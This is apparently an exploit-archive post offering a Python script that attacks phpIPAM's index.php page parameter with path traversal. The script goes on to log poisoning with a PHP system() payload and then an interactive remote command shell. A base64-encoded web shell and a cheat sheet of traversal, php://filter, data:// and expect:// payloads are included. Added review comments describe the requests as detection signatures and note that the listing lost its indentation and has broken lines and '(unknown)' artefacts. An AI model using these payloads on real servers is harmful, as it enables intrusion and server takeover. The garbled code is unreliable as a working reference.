phpIPAM 1.4 LFI to RCE Exploit
=============================================================================================================================================
| # Title : phpIPAM 1.4 LFI to RCE Exploit
|
| # Author : indoushka
|
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://github.com/phpipam/phpipam/blob/master/index.php
|
=============================================================================================================================================
[+] Summary : A critical Local File Inclusion (LFI) vulnerability exists in
phpIPAM's main index.php file due to insufficient input validation when
including page files. Attackers can exploit this to read sensitive system
files, potentially escalate to Remote Code Execution (RCE), and gain complete
control of the server.
[+] POC : python poc.py
#!/usr/bin/env python3
"""
phpIPAM LFI to RCE Exploit
"""
import requests
import sys
import urllib.parse
class phpIPAM_Exploit:
"""Probe a phpIPAM instance for path traversal in the index.php `page` parameter.

Every request this class sends is a GET to <target>/index.php whose `page`
value carries traversal sequences ('../' or '..\\'), later joined by a
`cmd` parameter.  Those parameter values are the concrete signature a
WAF rule or access-log review would key on when looking for this activity.

NOTE(review): the listing lost its indentation during extraction, and a
few lines (string literals and conditions split across line breaks) are
not valid Python as shown.  The comments below describe the code as written.
"""
def __init__(self, target):
# Base URL with any trailing slash removed; every request path is appended to it.
self.target = target.rstrip('/')
# One requests.Session is reused for all probes, so cookies returned by the
# target are carried between requests.
self.session = requests.Session()
def check_lfi(self, path):
"""Send one probe, GET {target}/index.php?page=<path>, and return the raw response.

No status or content check happens here; callers inspect response.text.
"""
params = {'page': path}
response = self.session.get(f"{self.target}/index.php",
params=params)
return response
def exploit_proc_self_environ(self):
"""Log-poisoning attempt: plant a PHP tag in the User-Agent, then include log/proc paths.

Returns True on the first candidate path whose follow-up request answers
HTTP 200, otherwise False.
"""
print("[*] Testing /proc/self/environ LFI...")
# First: a request whose User-Agent header contains a PHP tag, so that the
# tag is written to the web server's access log.  This `response` is never
# read; it is overwritten in the loop below.
headers = {
'User-Agent': '<?php system($_GET["cmd"]); ?>'
}
response = self.session.get(self.target, headers=headers)
# Second: try to include each candidate log / proc file via `page`.
log_paths = [
'/var/log/apache2/access.log',
'/var/log/httpd/access_log',
'/var/log/nginx/access.log',
'/proc/self/environ',
'/proc/self/fd/0'
]
for path in log_paths:
print(f"[*] Trying {path}...")
response = self.check_lfi(f"../../../../{path}")
# Weak oracle: the substring "php" is likely to appear in any page a PHP
# application serves (links to *.php, for instance), so this branch is
# probably taken on non-vulnerable targets as well.
if 'PHP' in response.text or 'php' in response.text:
print(f"[+] Possible LFI found: {path}")
# Command-execution test: the same inclusion plus cmd=whoami.
cmd_response = self.session.get(
f"{self.target}/index.php",
params={'page': f'../../../../{path}', 'cmd':
'whoami'}
)
# Success is inferred from the status code alone; the body is not
# inspected, so an ordinary 200 error page is also reported as RCE.
if cmd_response.status_code == 200:
print("[+] RCE successful!")
return True
return False
def upload_and_include(self, php_code):
"""Try to include guessable file names under /tmp (would need a separate upload path).

`php_code` is accepted but never used, and `shell` below is built but
never sent.  Returns the first matching filename, or None.
"""
# This would also require a file-upload vulnerability.
print("[*] Trying to upload and include PHP file...")
# PHP shell base64 encoded (unused; the literal is also split across a
# line break in this listing)
shell = "<?php echo
base64_decode('PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4='); ?>"
# Try to include /tmp files, substituting 0..99 for the '*' in each pattern.
tmp_files = [
'/tmp/sess_*',
'/tmp/php*',
'/tmp/upload*'
]
for pattern in tmp_files:
for i in range(100):
filename = pattern.replace('*', str(i))
# NOTE(review): `filename` is computed but not used in the request;
# as written, the literal "(unknown)" is requested on every iteration
# (apparently an extraction artefact, also visible in the print below).
response = self.check_lfi(f"../../../../(unknown)")
if 'uid=' in response.text or 'root' in
response.text.lower():
print(f"[+] Found vulnerable temp file: (unknown)")
return filename
return None
def interactive_shell(self, lfi_path):
"""Read commands from stdin and send each as cmd=<input> with page=../../../../<lfi_path>.

Loops until the user types 'exit'.  Printed output is limited to
non-empty response lines that do not start with '<' and do not contain
'html' (case-insensitive), each cut to 500 characters; the rest of the
page is discarded.
"""
print(f"\n[+] Interactive shell via LFI: {lfi_path}")
print("[+] Type 'exit' to quit\n")
while True:
cmd = input("shell").strip()
if cmd.lower() == 'exit':
break
params = {
'page': f'../../../../{lfi_path}',
'cmd': cmd
}
response = self.session.get(f"{self.target}/index.php",
params=params)
# Extract the output: keep only non-empty, non-markup lines.  The '<?'
# and '<!' prefixes are already covered by '<'.
lines = response.text.split('\n')
for line in lines:
if line and not line.startswith(('<', '<?', '<!')) and
'html' not in line.lower():
print(line[:500]) # print the first 500 characters only
def run(self):
"""Entry point: probe a fixed list of traversal payloads, then fall back to log poisoning.

Returns True as soon as one probe's body contains 'root:' (Unix passwd)
or '[extensions]' (Windows win.ini), after handing control to
interactive_shell; returns False if nothing matched.
"""
print("[*] phpIPAM LFI/RFI Exploit")
print(f"[*] Target: {self.target}")
# Basic LFI probes: three plain traversals, one '....//' filter-bypass
# variant and one backslash variant.
test_files = [
'../../../../etc/passwd',
'../../../../etc/hosts',
'../../../../windows/win.ini',
'....//....//....//....//etc/passwd',
'..\\..\\..\\..\\windows\\win.ini'
]
for test in test_files:
print(f"[*] Testing: {test}")
response = self.check_lfi(test)
if 'root:' in response.text or '[extensions]' in
response.text:
print(f"[+] LFI confirmed with: {test}")
print(f"[+] Response preview: {response.text[:200]}")
# Direct exploitation.  replace() only strips the plain '../../../../'
# prefix; the '....//' and '..\\' variants are passed through unchanged,
# and interactive_shell then prepends another '../../../../' to them.
self.interactive_shell(test.replace('../../../../', ''))
return True
# Other attempts: log poisoning.
if self.exploit_proc_self_environ():
return True
print("[-] No LFI vulnerability found")
return False
# Manual exploitation
def manual_exploitation():
"""Print a static cheat sheet of request shapes; this function sends nothing.

The text is a runtime string literal (program output) and is reproduced
as is.  Every listed form puts traversal sequences or a php://, data:// or
expect:// wrapper into the `page` parameter -- the same values a detection
rule on that parameter would match.
"""
print("""
=== phpIPAM LFI/RFI Manual Exploitation ===
1. Basic LFI Test:
/index.php?page=../../../../etc/passwd
/index.php?page=../../../../etc/shadow
/index.php?page=../../../../windows/win.ini
2. Log Poisoning:
# Step 1: Inject PHP into logs
GET /index.php HTTP/1.1
User-Agent: <?php system($_GET['cmd']); ?>
# Step 2: Include the log file
/index.php?page=../../../../var/log/apache2/access.log&cmd=id
3. PHP Filters (if enabled):
/index.php?page=php://filter/convert.base64-encode/resource=config.php
/index.php?page=php://filter/resource=/etc/passwd
4. Data URI (if allow_url_include=On):
/index.php?page=data://text/plain,<?php phpinfo();?>
/index.php?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=
5. Expect Wrapper (rare):
/index.php?page=expect://ls
""")
if __name__ == "__main__":
# CLI: exactly one positional argument (the base URL).  Otherwise print the
# usage line and the manual cheat sheet, then exit with status 1.
if len(sys.argv) != 2:
print("Usage: python3 phpipam_exploit.py <target_url>")
# NOTE(review): the next literal is split across a line break in this listing.
print("Example: python3 phpipam_exploit.py
http://localhost/phpipam")
manual_exploitation()
sys.exit(1)
target = sys.argv[1]
exploit = phpIPAM_Exploit(target)
# run()'s boolean result is discarded; the process exit status is 0 either way.
exploit.run()
Greetings to
:=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln
(John Page aka hyp3rlinx)|
===================================================================================================